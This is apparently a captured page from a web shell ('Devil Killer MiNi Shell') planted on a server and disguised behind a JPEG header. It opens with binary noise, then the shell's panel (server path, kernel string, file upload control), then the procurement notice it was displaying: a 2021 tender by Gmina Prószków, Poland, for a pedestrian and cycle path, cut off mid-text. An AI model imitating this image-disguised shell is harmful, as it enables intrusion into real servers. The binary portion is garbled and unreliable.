JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210518/0005758902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00057589 z dnia 2021-05-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> BUDOWA ŚCIEŻKI PIESZO-ROWEROWEJ WZDŁUŻ DROGI WOJEWÓDZKIEJ NR 414 NA ODCINKU PRZYSIECZ – LIGOTA PRÓSZKOWSKA<br/><br/>w formule zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Prószków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413248</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Opolska 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prószków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@proszkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.proszkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> BUDOWA ŚCIEŻKI PIESZO-ROWEROWEJ WZDŁUŻ DROGI WOJEWÓDZKIEJ NR 414 NA ODCINKU PRZYSIECZ – LIGOTA PRÓSZKOWSKA<br/><br/>w formule zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0b511b50-b7cf-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00057589</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001313/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa ścieżki pieszo-rowerowej wzdłuż drogi wojewódzkiej Nr 414 w m. Przysiecz - Ligota Prószkowska wraz z infrastrukturą towarzyszącą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Czas na przesiadkę w Aglomeracji Opolskiej” współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2014-2020, </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.proszkow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim przy użyciu pPlatformy mMiniPortal, który dostępny<br/>jest pod adresem: https://miniportal.uzp.gov.pl/ oraz skrzynki podawczej ePUAP dostępnej pod<br/>adresem: https://epuap.gov.pl/wps/portal. W postępowaniu o udzielenie zamówienia komunikacja<br/>pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych<br/>niż wskazanych w pkt 8 SWZ), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie<br/>za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (ID postępowania).Korzystanie z<br/>platformy oraz skrzynki jest bezpłatne. 2.Wykonawca zamierzający wziąć udział w postępowaniu o<br/>udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto<br/>na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty<br/>lub wniosku” oraz „Formularz do komunikacji”.3.Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP). 4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji”, wynosi 150 MB. 5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP. 6. Zamawiający przekazuje link do postępowania oraz ID postępowania. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu, klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.7. Zalecenia<br/>Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego: a) dla dokumentów w formacie pdf<br/>zaleca się podpis w formacie PAdES,b) dokumenty w formacie innym niż pdf zaleca się podpisywać<br/>formatem XAdES.8. Zamawiający rekomenduje przesyłanie danych w formatach dopuszczonych<br/>odpowiednimi przepisami prawa tj. m.in.: .doc, .xls, .pdf, .jpg (.jpeg), przy czym zaleca się<br/>wykorzystywanie plików w formacie pdf.W celu ewentualnej kompresji danych zamawiający<br/>rekomenduje wykorzystanie jednego z powszechnie dostępnych formatów takich jak: zip; .7Z.9.<br/>Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po ich podpisaniu.10.<br/>Dokumentacja niniejszego postępowania dostępna jest na platformie oraz na stronie internetowej<br/>Zamawiającego: http://www.bip.proszkow.pl/Zamówienia publiczne/Zamówienia publiczne - rok 2021 .<br/>Pobranie dokumentu następuje po kliknięciu na wybrany załącznik.11. Składając ofertę zaleca się<br/>zaplanowanie złożenia jej z wyprzedzeniem minimum 24h, aby zdążyć w terminie przewidzianym na jej<br/>złożenie w przypadku siły wyższej, jak np. awaria platformy EPUAP, awaria Internetu bądź problemy<br/>techniczne związane z brakiem np. aktualnej przeglądarki, itp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w punkcie 27 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w punkcie 27 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RO.271.3.2021.ORM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2497251,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Budowa ścieżki pieszo-rowerowej wzdłuż drogi wojewódzkiej nr<br/>414 na odcinku Przysiecz – Ligota Prószkowska” w formule zaprojektuj i wybuduj. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71323100-9 - Usługi projektowania systemów zasilania energią elektryczną</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. ZDOLNOŚĆ DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM Zamawiający odstępuje<br/>od określenia warunku w tym zakresie.2. UPRAWNIENIENIA DO PROWADZENIA<br/>OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE WYNIKA TO Z<br/>ODRĘBNYCH PRZEPISÓW. Zamawiający odstępuje od określenia warunku w tym zakresie.3.<br/>SYTUACJA EKONOMICZNA LUB FINANSOWA. Zamawiający wymaga by Wykonawca<br/>znajdował się w sytuacji finansowej lub ekonomicznej zapewniającej należyte wykonanie<br/>przedmiotowego zamówienia. Opis sposobu oceny spełniania tego warunku jest<br/>następujący: warunek zostanie uznany za spełniony, jeżeli Wykonawca:- wykaże posiadanie<br/>środków finansowych lub zdolności kredytowej w wysokości łącznej co najmniej 200.000,00 PLN<br/>(słownie: dwieście tysięcy złotych). Wartości podane w dokumentach potwierdzających spełnienie<br/>warunku w walutach innych niż PLN, Zamawiający jako kurs przeliczeniowy waluty przyjmie<br/>średni kurs Narodowego Banku Polskiego (NBP) opublikowany w dniu publikacji ogłoszenia o<br/>zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia NBP nie<br/>publikuje tabeli średnich kursów walut, Zamawiający przyjmie jako podstawę kurs z tabeli<br/>średnich kursów opublikowany w dniu najbliższym po dniu publikacji ogłoszenia o zamówieniu.4.<br/>ZDOLNOŚĆ TECHNICZNA LUB ZAWODOWA.1.Opis sposobu oceny spełniania tego warunku<br/>jest następujący: warunek ten będzie uznany za spełniony, jeżeli (wszystkie poniższe warunki<br/>muszą zostać spełnione łącznie):A. Zdolność zawodowa dot. doświadczenia<br/>wykonawcy. Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie: a) wykonał co najmniej jedną<br/>robotę budowlaną w formule „zaprojektuj i wybuduj” (wraz z wykonaniem dokumentacji<br/>projektowej) polegającą na budowie lub przebudowie ścieżki rowerowej lub ścieżki pieszorowerowej<br/>lub drogi dla rowerów o długości co najmniej 1000 metrów. Alternatywnie wykonał: a)<br/>co najmniej jedną dokumentację projektową dot. budowy ścieżki rowerowej lub ścieżki pieszorowerowej<br/>lub drogi dla rowerów o długości co najmniej 1000 metrów oraz b) co najmniej jedną<br/>robotę budowlaną polegającą na budowie lub przebudowie ścieżki rowerowej lub ścieżki pieszorowerowej<br/>lub drogi dla rowerów o długości co najmniej 1000 metrów- w ramach dwóch różnych<br/>inwestycji (zawartych umów) – osobno lit. a) i osobno lit. b) powyżej. Wykonawcy wspólnie<br/>ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że powyższy warunek<br/>spełnia co najmniej jeden wykonawca. B. Osoby skierowane przez wykonawcę do realizacji<br/>zamówienia. Zamawiający wymaga, aby Wykonawca wykazał się dysponowaniem osobami<br/>zdolnymi do wykonania niniejszego zamówienia (osobami, które zostaną skierowane do<br/>realizacji zamówienia), posiadającymi odpowiednie doświadczenie oraz kwalifikacje zawodowe,<br/>umożliwiające realizację zamówienia na odpowiednim poziomie jakości. Opis sposobu oceny<br/>spełniania tego warunku jest następujący:- Kierownik budowy (1 osoba): a) posiadający<br/>doświadczenie polegające na pełnieniu funkcji Kierownika budowy lub Kierownika robót<br/>drogowych podczas realizacji co najmniej jednego zadania polegającego na budowie lub<br/>przebudowie ścieżki rowerowej lub ścieżki pieszo-rowerowej lub drogi dla rowerów o długości co<br/>najmniej 1000 m, oraz b) posiadający uprawnienia budowlanie bez ograniczeń w specjalności<br/>inżynieryjnej drogowej, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j.<br/>Dz. U. z 2020 r. poz. 1333 ze zm.) lub odpowiadające im ważne uprawnienia budowlane wydane<br/>na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ,<br/>zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020 r., poz. 220 ze zm.) lub<br/>zgodnie z wcześniej obowiązującymi przepisami dotyczące uznawania kwalifikacji. Wykonawcy<br/>wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że powyższy<br/>warunek spełnia co najmniej jeden wykonawca.2. Zamawiający wyjaśnia, że:1) osoby<br/>posiadające uprawnienia budowlane wydane na terenie UE mogą uzyskać decyzję w sprawie<br/>uznania kwalifikacji zawodowych oraz wpis do stosownej izby na zasadach określonych w<br/>Ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej ((Dz. U. 2020 r., poz. 220 ze zm.) oraz w Regulaminie postępowania w sprawie uznawania kwalifikacji do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie obywateli państw członkowskich Unii Europejskiej,<br/>Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli w tych<br/>państwach, kwalifikacje odpowiadające uprawnieniom budowlanym w Polsce. (Załącznik do<br/>uchwały Krajowej Rady Polskiej Izby Inżynierów Budownictwa Uchwała nr 7/R/16 Krajowej<br/>Rady Polskiej Izby Inżynierów Budownictwa z dnia 18 maja 2016 r.) W razie uzyskania uznania<br/>kwalifikacji w zakresie wymaganym zgodnie z postanowieniami niniejszego punktu oraz wpisu<br/>do Izby Inżynierów Budownictwa uznaje się, że Wykonawca wykazał spełnienie warunków<br/>określonych w tym zakresie,2) pojęcia: „budowa”, „przebudowa”, o których mowa w podpunkcie<br/>1 powyżej, są rozumiane zgodnie z definicją zawartą w art. 3 pkt. 6, 7a, ustawy Prawo<br/>budowlane (t.j. Dz. U. z 2020, poz. 1333 ze zm.).3. W przypadku, gdy wykaz osób ujęty w SWZ,<br/>w opinii Wykonawcy może okazać się niewystarczający do prawidłowej realizacji którejkolwiek<br/>części zamówienia, lub w razie zaistnienia innej konieczności, Zamawiający dopuszcza<br/>możliwość jego uzupełnienia przez Wykonawcę o dodatkowe osoby, za akceptacją<br/>Zamawiającego. Wykaz osób wskazany powyżej powinien być uważany jako wymagania<br/>minimalne Zamawiającego dla wykazania przez Wykonawcę spełniania warunku udziału w<br/>postępowaniu w zakresie zdolności zawodowej oraz rzetelnego wypełnienia obowiązków<br/>Wykonawcy w trakcie realizacji umowy w sprawie Zamówienia. Od Wykonawcy wymaga się<br/>przed podpisaniem umowy w sprawie Zamówienia podania pełnego wykazu zespołu<br/>Wykonawcy proponowanego do realizacji umowy w sprawie zamówienia.4. Wynagrodzenie<br/>ewentualnie wskazanych dodatkowych osób zatrudnionych przez Wykonawcę należy<br/>uwzględnić w cenie oferty. Ewentualne dodatkowe wynagrodzenie należne członkom zespołu<br/>Wykonawcy nie będzie podlegało odrębnej zapłacie przez Zamawiającego i Wykonawca<br/>powinien uwzględnić je w cenie oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający<br/>zgodnie z art. 274 ust. 1 ustawy Pzp przed udzieleniem zamówienia wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych: 1) oświadczenia Wykonawcy, w<br/>zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r.,<br/>poz. 275 – tekst jednolity), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>(wzór oświadczenia stanowi załącznik nr 4 do SWZ). 2) odpisu lub informacji z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.<br/>1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji; 3) oświadczenia Wykonawcy o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: a) art. 108 ust. 1<br/>pkt 3 ustawy Pzp, b) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji, c) art. 108 ust. 1 pkt 6 ustawy Pzp- na<br/>załączniku nr 3 do SWZ;4) na potwierdzenie braku podstaw wykluczenia, informacji z Krajowego<br/>Rejestru Karnego w zakresie: a) art. 108 ust. 1 pkt 1 i/lub 2 ustawy Pzp, b) art. 108 ust. 1 pkt 4 ustawy<br/>Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,-<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu, wskazanych w pkt 4.3. oraz pkt 4.4. SWZ, Zamawiający, zgodnie z art. 274 ust. 1<br/>ustawy Pzp przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym, nie krótszym niż 